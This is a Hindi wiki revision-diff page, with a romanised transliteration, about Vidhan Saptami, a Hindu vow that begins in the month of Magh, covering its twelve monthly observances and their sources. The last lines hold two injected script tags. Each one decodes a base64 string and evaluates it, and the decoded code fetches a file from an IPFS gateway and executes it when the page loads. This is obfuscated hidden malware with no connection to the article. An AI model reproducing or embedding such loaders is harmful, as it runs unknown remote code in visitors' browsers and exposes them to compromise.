Difference between revisions of "विधान सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(8 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[माघ]] [[शुक्ल पक्ष]] की [[सप्तमी]] पर आरम्भ करना चाहिए।
 
*यह व्रत [[माघ]] [[शुक्ल पक्ष]] की [[सप्तमी]] पर आरम्भ करना चाहिए।
*[[माघ]] से प्रारम्भ कर 12 [[मास|मासों]] की सप्तमियों पर 12 वस्तुओं में केवल एक क्रम से ग्रहण किया जाता है। यथा– अर्क फूल का ऊपरी भाग, ताजा गोबर, मरिच, जल, फल, मूल (मूली), नक्त विधि, एकभक्त, दूध, केवल वायु ग्रहण, घी। इनमें <ref>कालविवेक (419); वर्षक्रियाकौमुदी (37-38); तिथितत्व(36-37); कृत्यतत्व (429-460); वर्षक्रियाकौमुदी (38)</ref> इसे रविव्रत <ref>(जिसका सम्पादन माघ के प्रथम रविवार से आरम्भ कर रविवार को किया जाता है)</ref> से विभिन्न माना है।
+
*[[माघ]] से प्रारम्भ कर 12 [[मास|मासों]] की सप्तमियों पर 12 वस्तुओं में केवल एक क्रम से ग्रहण किया जाता है। यथा– अर्क फूल का ऊपरी भाग, ताजा गोबर, मरिच, जल, फल, मूल (मूली), नक्त विधि, एकभक्त, दूध, केवल वायु ग्रहण, घी।<ref>कालविवेक (419); वर्षक्रियाकौमुदी (37-38); तिथितत्व(36-37); कृत्यतत्त्व (429-460); वर्षक्रियाकौमुदी (38</ref>  
 +
*इसे रविव्रत<ref>जिसका सम्पादन माघ के प्रथम रविवार से आरम्भ कर रविवार को किया जाता है</ref> से विभिन्न माना है।
 
   
 
   
 
तिथिव्रत; सूर्य देवता;
 
तिथिव्रत; सूर्य देवता;
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 13:00, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat magh shukl paksh ki saptami par arambh karana chahie.
  • magh se prarambh kar 12 masoan ki saptamiyoan par 12 vastuoan mean keval ek kram se grahan kiya jata hai. yatha– ark phool ka oopari bhag, taja gobar, marich, jal, phal, mool (mooli), nakt vidhi, ekabhakt, doodh, keval vayu grahan, ghi.[1]
  • ise ravivrat[2] se vibhinn mana hai.

tithivrat; soory devata;

tika tippani aur sandarbh

  1. kalavivek (419); varshakriyakaumudi (37-38); tithitatv(36-37); krityatattv (429-460); varshakriyakaumudi (38
  2. jisaka sampadan magh ke pratham ravivar se arambh kar ravivar ko kiya jata hai

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>